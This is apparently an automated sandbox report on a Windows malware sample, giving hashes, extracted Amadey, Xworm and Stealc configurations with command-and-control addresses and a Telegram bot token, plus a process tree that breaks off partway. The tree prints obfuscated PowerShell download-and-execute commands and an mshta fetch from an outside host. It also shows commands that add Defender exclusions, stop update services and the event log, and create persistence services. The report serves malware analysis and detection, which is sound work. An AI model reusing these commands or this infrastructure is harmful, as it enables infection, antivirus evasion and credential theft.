Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 02:15

General

  • Target

    2eb9ac7a217fdd500e26a8ad53d15f5a458a79240e58cb31348e820d338138ed.exe

  • Size

    1.8MB

  • MD5

    46ab0dfcc0d7963fb73bec088b2e576c

  • SHA1

    3300d08f1bb7663295961861bd51abe2a85ff5c6

  • SHA256

    2eb9ac7a217fdd500e26a8ad53d15f5a458a79240e58cb31348e820d338138ed

  • SHA512

    637feffec1fb32c4c7e97a8184797b0df8c590eb83e2d2e659ff70b331510dcaedd186e18cb4bac00245cfbbf8a1f283f0bb290c0cc541f508476532687d7709

  • SSDEEP

    49152:dr1+ox7lz+GcT2/2PlVULOrTECkun1W0Ro7:dh7nzWc2PWKkunc6o

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

C2

87.120.112.33:8398

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies security service 2 TTPs 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 29 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Modifies security service
      • Sets service image path in registry
      • Loads dropped DLL
      PID:480
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:612
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1692
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              3⤵
              • Checks BIOS information in registry
              • Checks processor information in registry
              PID:2208
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -Embedding
              3⤵
                PID:2716
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:692
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Modifies security service
                • Indicator Removal: Clear Windows Event Logs
                • Modifies Internet Explorer settings
                PID:776
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:832
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1180
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:872
                    • C:\Windows\system32\wbem\WMIADAP.EXE
                      wmiadap.exe /F /T /R
                      3⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      PID:1736
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:980
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:268
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:344
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1060
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1120
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                              2⤵
                                PID:2116
                              • C:\Windows\system32\sppsvc.exe
                                C:\Windows\system32\sppsvc.exe
                                2⤵
                                  PID:544
                                • C:\ProgramData\Mig\Mig.exe
                                  C:\ProgramData\Mig\Mig.exe
                                  2⤵
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3648
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3816
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    3⤵
                                      PID:3956
                                      • C:\Windows\system32\wusa.exe
                                        wusa /uninstall /kb:890830 /quiet /norestart
                                        4⤵
                                        • Drops file in Windows directory
                                        PID:2916
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop UsoSvc
                                      3⤵
                                      • Launches sc.exe
                                      PID:3964
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      3⤵
                                      • Launches sc.exe
                                      PID:1960
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop wuauserv
                                      3⤵
                                      • Launches sc.exe
                                      PID:2076
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop bits
                                      3⤵
                                      • Launches sc.exe
                                      PID:1192
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop dosvc
                                      3⤵
                                      • Launches sc.exe
                                      PID:2560
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1248
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2996
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:408
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1980
                                    • C:\Windows\system32\dialer.exe
                                      C:\Windows\system32\dialer.exe
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2016
                                    • C:\Windows\system32\dialer.exe
                                      C:\Windows\system32\dialer.exe
                                      3⤵
                                        PID:3156
                                      • C:\Windows\system32\dialer.exe
                                        dialer.exe
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1384
                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                      2⤵
                                        PID:1500
                                    • C:\Windows\system32\lsass.exe
                                      C:\Windows\system32\lsass.exe
                                      1⤵
                                        PID:488
                                      • C:\Windows\system32\lsm.exe
                                        C:\Windows\system32\lsm.exe
                                        1⤵
                                          PID:496
                                        • C:\Windows\Explorer.EXE
                                          C:\Windows\Explorer.EXE
                                          1⤵
                                          • Suspicious use of FindShellTrayWindow
                                          PID:1212
                                          • C:\Users\Admin\AppData\Local\Temp\2eb9ac7a217fdd500e26a8ad53d15f5a458a79240e58cb31348e820d338138ed.exe
                                            "C:\Users\Admin\AppData\Local\Temp\2eb9ac7a217fdd500e26a8ad53d15f5a458a79240e58cb31348e820d338138ed.exe"
                                            2⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Identifies Wine through registry keys
                                            • Loads dropped DLL
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of WriteProcessMemory
                                            PID:1044
                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                              "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Loads dropped DLL
                                              • Adds Run key to start application
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of WriteProcessMemory
                                              PID:2652
                                              • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
                                                4⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Modifies system certificate store
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1036
                                              • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of WriteProcessMemory
                                                PID:2460
                                                • C:\Windows\system32\wscript.exe
                                                  "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1876
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                    6⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2996
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                      7⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1208
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                        8⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:860
                                                        • C:\Windows\system32\mshta.exe
                                                          mshta http://176.113.115.178/Windows-Update
                                                          9⤵
                                                          • Blocklisted process makes network request
                                                          • Modifies Internet Explorer settings
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:316
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                            10⤵
                                                            • UAC bypass
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2268
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                              11⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1652
                                                            • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                              "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                              11⤵
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Drops file in System32 directory
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1824
                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                12⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Drops file in System32 directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:964
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                12⤵
                                                                  PID:2768
                                                                  • C:\Windows\system32\wusa.exe
                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                    13⤵
                                                                    • Drops file in Windows directory
                                                                    PID:2832
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:2776
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:2824
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:2864
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe stop bits
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:1820
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:2024
                                                                • C:\Windows\system32\powercfg.exe
                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  12⤵
                                                                  • Power Settings
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1776
                                                                • C:\Windows\system32\powercfg.exe
                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  12⤵
                                                                  • Power Settings
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:316
                                                                • C:\Windows\system32\powercfg.exe
                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  12⤵
                                                                  • Power Settings
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1300
                                                                • C:\Windows\system32\powercfg.exe
                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  12⤵
                                                                  • Power Settings
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1760
                                                                • C:\Windows\system32\dialer.exe
                                                                  C:\Windows\system32\dialer.exe
                                                                  12⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1512
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe delete "LIB"
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:1012
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:868
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:3420
                                                                • C:\Windows\system32\sc.exe
                                                                  C:\Windows\system32\sc.exe start "LIB"
                                                                  12⤵
                                                                  • Launches sc.exe
                                                                  PID:3428
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                      6⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2040
                                                      • C:\Windows\system32\ipconfig.exe
                                                        "C:\Windows\system32\ipconfig.exe" /flushdns
                                                        7⤵
                                                        • Gathers network information
                                                        PID:964
                                                • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:892
                                                  • C:\Users\Admin\AppData\Local\Temp\is-0D7H7.tmp\FunnyJellyfish.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-0D7H7.tmp\FunnyJellyfish.tmp" /SL5="$C0150,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1588
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                      6⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2728
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 3
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:3068
                                                      • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2640
                                                        • C:\Users\Admin\AppData\Local\Temp\is-SR0QN.tmp\FunnyJellyfish.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-SR0QN.tmp\FunnyJellyfish.tmp" /SL5="$60196,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:1044
                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                            "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                            9⤵
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:556
                                                            • C:\Windows\system32\regsvr32.exe
                                                              /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                              10⤵
                                                              • Loads dropped DLL
                                                              PID:704
                                                • C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"
                                                  4⤵
                                                  • Drops startup file
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Suspicious behavior: AddClipboardFormatListener
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3044
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1076
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1776
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1984
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1440
                                                • C:\Users\Admin\AppData\Local\Temp\1008081001\10f5c07377.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1008081001\10f5c07377.exe"
                                                  4⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Loads dropped DLL
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Checks processor information in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1228
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                    5⤵
                                                    • Uses browser remote debugging
                                                    • Enumerates system info in registry
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:1992
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef3d49758,0x7fef3d49768,0x7fef3d49778
                                                      6⤵
                                                        PID:852
                                                      • C:\Windows\system32\ctfmon.exe
                                                        ctfmon.exe
                                                        6⤵
                                                          PID:1192
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=148 --field-trial-handle=1268,i,7084489488706064335,16320409992050742637,131072 /prefetch:2
                                                          6⤵
                                                          • Drops file in Program Files directory
                                                          PID:560
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1268,i,7084489488706064335,16320409992050742637,131072 /prefetch:8
                                                          6⤵
                                                            PID:1520
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
